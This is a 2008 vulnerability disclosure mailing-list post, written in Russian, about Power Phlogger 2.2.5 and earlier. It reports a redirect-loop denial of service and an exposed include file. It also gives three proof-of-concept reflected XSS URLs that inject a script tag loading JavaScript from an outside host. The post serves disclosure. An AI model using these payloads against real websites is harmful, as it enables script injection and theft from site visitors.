Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

E-SMART CART (productsofcat. asp) Remote SQL Injection Vulnerability

Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

PHP JOBWEBSITE PRO (JobSearch3. php) SQL Injection Vulnerability

[ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 Sql Injection Vulnerability

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	16.06.2008
Subject:	Multiple new vulnerabilities in Power Phlogger

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Denial of Service, Information Leakage и Cross-Site Scripting уязвимостях в Power Phlogger.

DoS:

http://site/newaccount_self.php

Скрипт редиректит сам на себя (зацикленный редирект). Что может создать большую нагрузку на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.
js%20

http://site/dspStats.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.
js%20

http://site/edCss.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.
js%20

Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2178/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua